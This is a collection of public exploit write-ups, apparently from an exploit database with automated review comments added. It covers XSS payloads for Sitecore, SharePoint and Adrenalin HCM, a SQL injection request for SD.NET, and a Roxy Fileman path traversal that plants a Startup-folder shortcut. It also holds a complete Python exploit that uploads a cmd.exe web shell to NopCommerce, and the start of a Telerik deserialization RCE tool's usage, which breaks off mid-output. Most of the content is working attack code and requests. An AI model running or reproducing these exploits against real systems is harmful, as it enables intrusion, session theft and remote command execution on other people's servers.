Sitecore CMS makes it effortless to create content and experience rich websites that help you achieve your business goals such as increasing sales and search engine visibility, while being straight-forward to integrate and administer. Sitecore lets you deliver sites that are highly scalable, robust and secure. Whether you're focused on marketing, development and design, or providing site content, Sitecore delivers for you.
Description
------------
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
Vulnerability Class
--------------------
Cross-site Scripting (XSS) - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Proof of Concept
----------------
File Extension parameter is not properly escaped. This could lead to an XSS attack that could possibly affect administrators,users,editor.
1. Login to application and navigate to "https://example.com/sitecore/shell/Applications/Content Editor.aspx?sw_bw=1"
2. Go to media library and click on any image and edit it
3. Now in Extension input parameter inject any XSS vector like '"><svg=onload=prompt(2)>
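Review bot: the header's `Version: 9.0 rev. 171002` (and the title) disagree with `Tested on: Sitecore Experience Platform 8.1 Update-3 i.e.; 8.1 rev. 160519`; state which build the PoC was actually verified on, or list both as affected. The Description and Vulnerability Class sections are generic OWASP boilerplate, and the one sentence specific to this finding (`File Extension parameter is not properly escaped`) is filed under Proof of Concept and does not say where the extension value is rendered back unescaped, which is what a reader needs in order to confirm a fix.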


@ -0,0 +1,177 @@
# Exploit Title: Microsoft SharePoint 2013 SP1 - 'DestinationFolder' Persistent Cross-Site Scripting
# Author: Davide Cioccia
# Discovery Date: 2019-09-25
# Vendor Homepage: https://www.microsoft.com
# Software Link: https://support.microsoft.com/en-us/help/2880552/description-of-microsoft-sharepoint-server-2013-service-pack-1-sp1
# Tested Version: SP1
# Tested on: Microsoft Windows Server 2016
# CVE: CVE-2019-1262
# Advisory ID: ZSL-2019-5533
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5533.php
# MSRC: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1262
Vendor: Microsoft Corporation
Product web page: https://www.microsoft.com
Affected version: 2013 SP1
Summary: SharePoint is a web-based collaborative platform that
integrates with Microsoft Office. Launched in 2001, SharePoint
is primarily sold as a document management and storage system,
but the product is highly configurable and usage varies substantially
among organizations.
Desc: A cross-site-scripting (XSS) vulnerability exists when Microsoft
SharePoint Server does not properly sanitize a specially crafted web
request to an affected SharePoint server. An authenticated attacker
could exploit the vulnerability by sending a specially crafted request
to an affected SharePoint server. The attacker who successfully exploited
the vulnerability could then perform cross-site scripting attacks on
affected systems and run script in the security context of the current
user. The attacks could allow the attacker to read content that the
attacker is not authorized to read, use the victim's identity to take
actions on the SharePoint site on behalf of the user, such as change
permissions and delete content, and inject malicious content in the
browser of the user.
Sharepoint 2013 SP1 allows users to upload files to the platform, but
does not correctly sanitize the filename when the files are listed. An
authenticated user that has the rights to upload files to the SharePoint
platform, is able to exploit a Stored Cross-Site Scripting vulnerability
in the filename. The filename is reflected in the attribute 'aria-label'
of the following HTML tag.
# PoC request:
POST /FOLDER/_layouts/15/Upload.aspx?List={689D112C-BDAA-4B05-B0CB-0DFB36CF0649}&RootFolder=&IsDlg=1 HTTP/1.1
Host: vulnerable_sharepoint_2013
Connection: close
Content-Length: 31337
Cache-Control: max-age=0
Authorization: Negotiate YIIV9gYGKwYBBQUCo........................JBAq39IdJh3yphI1uHbz/jbQ==
Origin: https://vulnerable_sharepoint_2013.tld
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryewNI1MC6qaHDB50n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Sec-Fetch-Mode: nested-navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,it-IT;q=0.8,it;q=0.7,nl;q=0.6
Cookie: ...
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOWebPartPage_PostbackSource"
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOTlPn_SelectedWpId"
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOTlPn_View"
0
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOTlPn_ShowSettings"
False
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOGallery_SelectedLibrary"
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOGallery_FilterString"
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOTlPn_Button"
none
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__EVENTTARGET"
ctl00$PlaceHolderMain$ctl00$RptControls$btnOK
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__EVENTARGUMENT"
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOSPWebPartManager_DisplayModeName"
Browse
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOSPWebPartManager_ExitingDesignMode"
false
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOWebPartPage_Shared"
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOLayout_LayoutChanges"
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOLayout_InDesignMode"
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOSPWebPartManager_OldDisplayModeName"
Browse
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOSPWebPartManager_StartWebPartEditingName"
false
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOSPWebPartManager_EndWebPartEditing"
false
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="_maintainWorkspaceScrollPosition"
0
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__REQUESTDIGEST"
[DIGEST]
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__VIEWSTATE"
[VIEWSTATE]
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
E6912F23
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__SCROLLPOSITIONX"
0
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__SCROLLPOSITIONY"
0
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__EVENTVALIDATION"
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="destination"
[DESTINATION_FOLDER]
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="ctl00$PlaceHolderMain$ctl01$ctl04$InputFile"; filename="' onmouseover=alert(document.cookie) '.jpg"
Content-Type: image/jpeg
ZSL
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="ctl00$PlaceHolderMain$ctl01$ctl04$OverwriteSingle"
on
------WebKitFormBoundaryewNI1MC6qaHDB50n--
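Review bot: the Desc paragraph ends with `The filename is reflected in the attribute 'aria-label' of the following HTML tag.` but no HTML tag follows; the PoC request comes next. Add the rendered element, or at least name the page or view that lists the uploaded file, so the sink is documented alongside the source. In the request, `Content-Length: 31337` is a placeholder that cannot match the body shown, and `[DIGEST]`, `[VIEWSTATE]` and `[DESTINATION_FOLDER]` are placeholders too; mark the length as one as well so the request is not read as a verbatim capture.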


@ -0,0 +1,30 @@
# Exploit Title: SD.NET RIM 4.7.3c - 'idtyp' SQL Injection
# Date: 2019-11-05
# Exploit Author: Fabian Mosch (r-tec IT Security GmbH)
# Vendor Homepage: https://www.sitzungsdienst.net/
# Software Link: https://www.sitzungsdienst.net/2018/12/sd-net-rim-4-7-3-veroeffentlicht/
# Version: < 4.7.3c
# Tested on: < 4.7.3c
# CVE : N/A
# SD.NET RIM before version 4.7.3c is vulnerable to a SQL-Injection vulnerability. To Exploit the vulnerability
# an attacker has to inject arbitrary SQL Statements in the following POST parameters:
POST /vorlagen/?__=SOMEBASE64 HTTP/1.1
Host: VulnerableHost.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
Origin: https://vulnerablehost.com
Connection: close
Referer: https://vulnerablehost.com/vorlagen/?__=BASE64
Cookie: PHPSESSID250=SESSIONID
Upgrade-Insecure-Requests: 1
reqid=f48de4c24ae1b72dd37ebde6f6b40544&nummer=t&idtyp=-1INJECTHERE&idgremium=-1INJECTHERE&datefrom=TT.MM.JJJJ&dateto=TT.MM.JJJJ&csrftoken=CSRFToken
# The attacker is then redirected with a 302 redirect to an URL /templates/?__=NEWBASE64 as GET request.
# By issuing the second request the arbitrary SQL-Statement gets executed.
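Review bot: the title names only `idtyp`, but the request marks both `idtyp=-1INJECTHERE` and `idgremium=-1INJECTHERE` and the description says `the following POST parameters` (plural); either list both parameters in the title or state that only `idtyp` was confirmed. `Tested on: < 4.7.3c` is a version range rather than a tested version; give the concrete build the finding was reproduced on. Grammar: `redirected with a 302 redirect to an URL` should read `redirected (302) to a URL`.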


@ -0,0 +1,43 @@
# Exploit Title: Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: Rishu Ranjan (Cy83rl0gger)
# Vendor Homepage: https://www.myadrenalin.com/
# Software Link: https://www.myadrenalin.com/core-hcm/
# Version: 5.4.0 (REQUIRED)
# Tested on: NA
# CVE : CVE-2018-12234
# Type: webapps
# Platform: Multiple
# Description
# ====================
# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Adrenalin Core HCM v5.4.0 of HRMS Software.
# The user supplied input containing malicious JavaScript is echoed back as it is in JavaScript code in an HTML response.
# URL
# ====================
https://<Host:port>/Adrenalin/flexiportal/GeneralInfo.aspx?strAction=Update0%22[Javascript code]22HRMS%22%29%2f%2f1
https://<Host:port>/myadrenalin/flexiportal/GeneralInfo.aspx?strAction=Update11170%22%3balert(%22HRMS%22)%2f%2f155
Parameter
====================
strAction
Attack Type
====================
Remote
CVE Impact Other
====================
Allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc.
Reference
====================
https://nvd.nist.gov/vuln/detail/CVE-2018-12234
https://www.knowcybersec.com/2018/09/first-cve-2018-12234-reflected-XSS.html
Discoverer
====================
Rishu Ranjan
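Review bot: `Version: 5.4.0 (REQUIRED)` still carries the submission template's `(REQUIRED)` marker, and `Google Dork: NA` / `Tested on: NA` are unfilled template fields; remove the marker and either fill or drop the NA fields (`Tested on` in particular should name the platform the PoC was run against). The Description and URL headings are `#`-commented while `Parameter`, `Attack Type`, `CVE Impact Other`, `Reference` and `Discoverer` are not, so the file is neither a plain-text advisory nor a commented script; use one convention throughout.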


@ -0,0 +1,44 @@
# Exploit Title: Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: Rishu Ranjan (Cy83rl0gger)
# Vendor Homepage: https://www.myadrenalin.com/
# Software Link: https://www.myadrenalin.com/core-hcm/
# Version: 5.4.0 (REQUIRED)
# Tested on: NA
# CVE : CVE-2018-12650
# Type: webapps
# Platform: Multiple
# Description
# ====================
# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Adrenalin Core HCM v5.4.0 HRMS Software.
# The user supplied input containing malicious JavaScript is echoed back as it is in JavaScript code in an HTML response.
URL
====================
https://<Host:port>/myadrenalin/AppMaint/ApplicationtEmployeeSearch.aspx?popToken=emp&prntFrmName=AppAccFrm76096%22%3balert(1)%2f%2f150&prntDDLCntrlName=hdnEmpSearch&HRShow=0&CntrlType=txt&Applicationid=&Grade=undefined
https://<Host:port>/Adrenalin/AppMaint/ApplicationtEmployeeSearch.aspx?popToken=emp&prntFrmName=AppAccFrm76096%22%3balert(1)%2f%2f150&prntDDLCntrlName=hdnEmpSearch&HRShow=0&CntrlType=txt&Applicationid=&Grade=undefined
Parameter
====================
prntDDLCntrlName
prntFrmName
Attack Type
====================
Remote
CVE Impact Other
====================
Allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc.
Reference
====================
https://nvd.nist.gov/vuln/detail/CVE-2018-12650
https://www.knowcybersec.com/2018/10/CVE-2018-12650-reflected-XSS.html
Discoverer
====================
Rishu Ranjan
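Review bot: the title attributes the issue to `prntDDLCntrlName`, but in both PoC URLs the payload sits in `prntFrmName` (`prntFrmName=AppAccFrm76096%22%3balert(1)%2f%2f150`) while `prntDDLCntrlName=hdnEmpSearch` carries an ordinary value; the Parameter section lists both. State which parameter(s) were actually confirmed so the title matches the evidence. Same template residue as the sibling entry: `Version: 5.4.0 (REQUIRED)`, `Google Dork: NA`, `Tested on: NA`, and the mixed `#`-commented / uncommented headings.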


@ -0,0 +1,45 @@
# Exploit Title: Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: Rishu Ranjan
# Vendor Homepage: https://www.myadrenalin.com/
# Software Link: https://www.myadrenalin.com/core-hcm/
# Version: 5.4.0 (REQUIRED)
# Tested on: NA
# CVE : CVE-2018-12653
# Type: webapps
# Platform: Multiple
# Description
# ====================
# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in
# Adrenalin Core HCM v5.4.0 HRMS Software. The user supplied input containing
# malicious JavaScript is echoed back as it is in JavaScript code in an HTML
# response.
URL
====================
https://
<HOST:PORT>/myadrenalin/RPT/SSRSDynamicEditReports.aspx?ReportId=109LWFREPORT.RDL15822%27%3balert(%22Reflected%20XSS%22)%2f%2f773&Export=0
Parameter
====================
ReportId
Attack Type
====================
Remote
CVE Impact Other
====================
Allows an attacker to input malicious JavaScript which can steal cookie,
redirect them to other malicious website, etc.
Reference
====================
https://nvd.nist.gov/vuln/detail/CVE-2018-12653
https://www.knowcybersec.com/2019/02/CVE-2018-12653-reflected-XSS.html
Discoverer
====================
Rishu Ranjan
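Review bot: the PoC URL is broken across two lines (`https://` on one line, `<HOST:PORT>/myadrenalin/RPT/SSRSDynamicEditReports.aspx?...` on the next), so it cannot be copied as a single URL; join it. The title says `'ReportID'` while the query string and the Parameter section use `ReportId`; use one spelling so the advisory is searchable by the real parameter name. Template residue as in the two sibling entries: `(REQUIRED)`, `Google Dork: NA`, `Tested on: NA`.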


@ -0,0 +1,125 @@
# Exploit Title: Roxy Fileman 1.4.5 - Directory Traversal
# Author: Patrik Lantz
# Date: 2019-12-06
# Software: Roxy Fileman
# Version: 1.4.5
# Vendor Homepage: http://www.roxyfileman.com/
# Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-net
# CVE: CVE-2019-19731
Tested on: ASP.NET 4.0.30319 and Microsoft-IIS 10.0, Windows 10 Pro Build 17134
(using custom account as application pool identity for the IIS worker process).
===========================
Description
===========================
Roxy Fileman 1.4.5 for .NET is vulnerable to path traversal which can lead to file write in arbitrary locations depending on
the IIS worker process privileges.
This PoC demonstrates a crafted Windows shortcut file being uploaded and written to the Startup folder. The execution
of this file will be triggered on the next login.
Proof of Concept
===========================
It's possible to write an uploaded file to arbitrary locations using the RENAMEFILE action.
The RenameFile function in main.ashx does not check if the new file name 'name' is a valid location.
Moreover, the default conf.json has an incomplete blacklist for file extensions which in this case
allows Windows shortcut files to be uploaded, alternatively existing files can be renamed to include
the .lnk extension.
1) Create a shortcut file
By using for example the target executable C:\Windows\System32\Calc.exe
Remove the .lnk extension and rename it to use the .dat extension.
2) Upload the file
Either upload the .dat file manually via the Roxy Fileman web interface
or programmatically using a HTTP POST request.
Details of the request:
POST /wwwroot/fileman/asp_net/main.ashx?a=UPLOAD HTTP/1.1
Host: 127.0.0.1:50357
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------159382831523528
Content-Length: 924
Origin: http://127.0.0.1:50357
Connection: close
Referer: http://127.0.0.1:50357/wwwroot/fileman/
Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list
-----------------------------159382831523528
Content-Disposition: form-data; name="action"
upload
-----------------------------159382831523528
Content-Disposition: form-data; name="method"
ajax
-----------------------------159382831523528
Content-Disposition: form-data; name="d"
/wwwroot/fileman/Uploads/test2
-----------------------------159382831523528
Content-Disposition: form-data; name="files[]"; filename="poc.dat"
Content-Type: application/octet-stream
...data omitted...
-----------------------------159382831523528--
3) Write the file to the Startup folder using the RENAMEFILE action
The new filename is set via the n parameter. The correct path can be identified by trial and error depending
on the location of wwwroot on the filesystem and the privileges for the IIS worker process (w3wp.exe).
If the necessary directories do not exist, they can be created using the CREATEDIR action which also
is vulnerable to path traversal.
POST /wwwroot/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2Fwwwroot%2Ffileman%2FUploads%2FDocuments%2Fpoc.dat&n=../../../../../../../../AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/poc.txt.lnk HTTP/1.1
Host: 127.0.0.1:50357
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 66
Origin: http://127.0.0.1:50357
Connection: close
Referer: http://127.0.0.1:50357/wwwroot/fileman/
Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list
f=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2%2Fpoc.dat&n=poc.dat
Workaround / Fix:
===========================
Patch the main.ashx code in order to perform checks for all paths that they are valid in the following actions:
CREATEDIR, COPYFILE and RENAMEFILE.
Recommendations for users of Roxy Fileman:
- Add lnk file extension to the conf.json under FORBIDDEN_UPLOADS, and aspx since it is not included in the blacklist by default.
Timeline
===========================
2019-12-06: Discovered the vulnerability
2019-12-06: Reported to the vendor (vendor is unresponsive)
2019-12-11: Request CVE
2019-12-13: Advisory published
Discovered By:
===========================
Patrik Lantz
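Review bot: step 3 says the new filename is set via `n`, and the request line carries it in the query string (`a=RENAMEFILE&f=%2Fwwwroot%2Ffileman%2FUploads%2FDocuments%2Fpoc.dat&n=../../...`), but the POST body shown is `f=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2%2Fpoc.dat&n=poc.dat`, with a different `f` (`Uploads/test2` vs `Uploads/Documents`) and an ordinary `n`; say which of the two the handler reads, because as printed the body and the query string contradict each other. In the Workaround section, the `FORBIDDEN_UPLOADS` recommendation covers only the upload path; the advisory itself notes that `existing files can be renamed to include the .lnk extension`, so the recommendation should say whether `RenameFile` also applies that list, and if not, that the code patch (path validation in CREATEDIR, COPYFILE and RENAMEFILE) is the actual fix and the blacklist entry is only a mitigation.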

79
exploits/aspx/webapps/47783.py Executable file

@ -0,0 +1,79 @@
# Vulnerability Title: NopCommerce 4.2.0 - Privilege Escalation
# Author: Alessandro Magnosi (d3adc0de)
# Date: 2019-07-07
# Vendor Homepage: https://www.nopcommerce.com/
# Software Link : https://www.nopcommerce.com/
# Tested Version: 4.2.0
# Vulnerability Type: Privilege Escalation
# Tested on OS: Windows 10, CentOS, Docker
# Exploit designed for: NopCommerce 4.2.0 on IIS
import requests
import argparse
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import warnings
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
def proxy(flag):
return {"http" : "http://127.0.0.1:9090", "https" : "http://127.0.0.1:9090"} if flag else None
def geturl(baseurl, type):
if type == "login":
return baseurl + "/login"
elif type == "mv":
return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=RENAMEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2fCommon%2f&n=Common2"
elif type == "mkdir":
return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=CREATEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2f&n=Common"
elif type == "put":
return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=UPLOAD"
elif type == "contactus":
return baseurl + "/contactus"
else:
return ""
def login(email, password, url, proxy):
res = requests.get(geturl(url, "login"), proxies=proxy, verify=False, allow_redirects=False)
cookie = res.cookies.get_dict()
soup = BeautifulSoup(res.text, features="html.parser")
token = soup.find("input", {"name":"__RequestVerificationToken"})["value"]
res = requests.post(geturl(url, "login"), cookies=cookie, data={"Email":email, "Password":password, "__RequestVerificationToken":token, "RememberMe":"false"}, proxies=proxy, verify=False, allow_redirects=False)
cookies = res.cookies.get_dict()
return { **cookies, **cookie }
def shellupload(email, password, url, proxy):
print("[+] Trying uploading shell from")
cookies = login(email, password, url, proxy)
# Rename Common Directory
requests.get(geturl(url, "mv"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
# Create Common Directory
requests.get(geturl(url, "mkdir"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
# Upload File into Common
requests.post(geturl(url, "put"), headers={"Content-Type" : "multipart/form-data; boundary=---------------------------3125261928760" ,"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, data="-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\najax\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"d\"\r\n\r\n/images/uploaded/../../../../../../../../../../inetpub/wwwroot/nopcommerce/Views/Common/\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"ContactUs.cshtml\"\r\nContent-Type: image/png\r\n\r\n@using System\r\n@using System.Diagnostics\r\n\r\n@{ \r\n ViewData[\"Title\"] = \"MVC Sh3ll Windows\";\r\n var result = \"\";\r\n var cmd = Context.Request.Query[\"cmd\"];\r\n if (!String.IsNullOrEmpty(cmd)){\r\n result = Bash(cmd);\r\n }\r\n\r\n if (String.IsNullOrEmpty(result)){\r\n result = \"Invalid command or something didn't work\";\r\n }\r\n\r\n}\r\n\r\n@functions{\r\n public static string Bash (string cmd)\r\n {\r\n var result = \"\";\r\n var escapedArgs = cmd.Replace(\"\\\"\", \"\\\\\\\"\");\r\n var process = new Process()\r\n {\r\n StartInfo = new ProcessStartInfo\r\n {\r\n FileName = \"cmd.exe\",\r\n Arguments = $\"/C \\\"{escapedArgs}\\\"\",\r\n RedirectStandardOutput = true,\r\n UseShellExecute = false,\r\n CreateNoWindow = true,\r\n }\r\n };\r\n\r\n process.Start();\r\n result = process.StandardOutput.ReadToEnd();\r\n process.WaitForExit();\r\n\r\n return result;\r\n }\r\n}\r\n\r\n\r\n\r\n<script\r\n src=\"https://code.jquery.com/jquery-3.2.1.min.js\"\r\n integrity=\"sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=\"\r\n crossorigin=\"anonymous\"></script>\r\n<script>\r\n$(function() {\r\n var cmdResult = 
$(\"#cmdResult\");\r\n\r\n\tconsole.log(cmdResult);\r\n\r\n\tif (cmdResult.text() === \"Invalid command or something didn't work\"){\r\n\t console.log(\"should change text\");\r\n cmdResult.css(\"color\", \"red\");\r\n\t}\r\n\t\r\n\tvar term = $(\"#console\");\r\n $(\"#cmd\").focus();\r\n\tterm.scrollTop(term.prop(\"scrollHeight\"));\r\n\t\r\n\t$.urlParam = function(name){\r\n var results = new RegExp('[\\?&]' + name + '=([^&#]*)').exec(window.location.href);\r\n if (results==null){\r\n return null;\r\n }\r\n else{\r\n return decodeURI(results[1]) || 0;\r\n }\r\n }\r\n\r\n\t\r\n\tfunction executeCmd(){\r\n var cmd = encodeURIComponent($(\"#cmd\").val());\r\n\t var currentCmd = $.urlParam('cmd');\r\n\t console.log(\"should replace: \" + currentCmd + \" WITH: \" + cmd);\r\n\r\n\t var currentUrl = location.href;\r\n\r\n\t var paramDelimeter = \"\";\r\n\t if (currentUrl.indexOf(\"?\") < 0){\r\n\t paramDelimeter = \"?\";\r\n\t } else {\r\n\t paramDelimeter = \"&\";\r\n\t }\r\n \r\n\t if (currentUrl.indexOf(\"cmd=\") < 0){\r\n currentUrl = location.href + paramDelimeter + \"cmd=\";\r\n\t }\r\n\t\r\n var newUrl = currentUrl.replace(/cmd=.*/, \"cmd=\"+cmd);\r\n window.location.href = newUrl;\r\n\r\n\t //console.log(newUrl);\r\n\t}\r\n\t\r\n $(\"#submitCommand\").click(function(){\r\n\t executeCmd();\r\n\t})\r\n\r\n\t$(\"#cmd\").keypress(function (e) {\r\n\t if (e.which == 13) {\r\n\t executeCmd();\r\n\t return false;\r\n\t }\r\n\t});\r\n\r\n\t$(\"#cmd\").on(\"change paste keyup\", function(theVal){\r\n\t var cmd = $(\"#cmd\").val();\r\n\t $(\"#cmdInput\").text(cmd);\r\n\t});\r\n});\r\n\r\n</script>\r\n\r\n\r\n<h3>@ViewData[\"Title\"].</h3>\r\n<h4>@ViewData[\"Message\"]</h4>\r\n<h4>Output for:> <span style=\"font-family: monospace; font-weight: normal;\">@cmd</span></h4>\r\n\r\n\r\n<pre id=\"console\" style=\"color: #00ff00;background-color: #141414;max-height: 606px;\">\r\nC#:>@cmd\r\n\t\r\n<span id=\"cmdResult\">@result</span>\r\n\t\r\nC#:><span 
id=\"cmdInput\"></span>\r\n</pre>\r\n\r\n<br />\r\n\r\n<p>Enter your command below:</p>\r\n<span style=\"display: inline-flex !important;\">\r\n <input id=\"cmd\" class=\"form-control\" type=\"text\" style=\"width: 400px;\" /> \r\n\t<button id=\"submitCommand\" class=\"btn btn-primary\">Send!</button>\r\n</span>\r\n\r\n-----------------------------3125261928760--", proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
# Test if it is working
res = requests.get(geturl(url, "contactus"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
soup = BeautifulSoup(res.text, features="html.parser")
test = soup.find("span", {"id" : "cmdResult"})
if test is None:
print("[-] Maybe the target is not vulnerable, or you need to restart the appliance")
else:
print("[+] Shell uploaded under contact us page")
def main():
parser = argparse.ArgumentParser(description='Upload a shell in NopCommerce')
parser.add_argument(
'-e', '--email', required=True, type=str, help='Username')
parser.add_argument(
'-p', '--password', required=True, type=str, help='Password')
parser.add_argument(
'-u', '--url', required=True, type=str, help='Base Url of NopCommerce')
parser.add_argument(
'-x', '--proxy', required=False, action="store_true", help='Proxy (for debugging)')
args = parser.parse_args()
shellupload(args.email, args.password, args.url, proxy(args.proxy))
if __name__ == '__main__':
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
main()
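Review bot: the argparse help strings in `main()` do not match their flags: `-e/--email` is documented as 'Username', and `-x/--proxy` is a `store_true` boolean whose help text 'Proxy (for debugging)' reads as if it took a proxy address. Change the first to `help='Account e-mail used to log in'` and make the second say it toggles a preconfigured debugging proxy, so the usage output describes what `proxy(args.proxy)` actually receives.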


@ -0,0 +1,50 @@
See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).
Install
git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935
python3 -m venv env
source env/bin/activate
pip3 install -r requirements.txt
Requirements
This exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.
Usage
Compile mixed mode assembly DLL payload
In a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.
build_dll.bat sleep.c
Upload and load payload into application via insecure deserialization
Pass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.
python3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\Windows\Temp' -p sleep_2019121205271355_x86.dll
[*] Local payload name: sleep_2019121205271355_x86.dll
[*] Destination folder: C:\Windows\Temp
[*] Remote payload name: 1576142987.918625.dll
{'fileInfo': {'ContentLength': 75264,
'ContentType': 'application/octet-stream',
'DateJson': '1970-01-01T00:00:00.000Z',
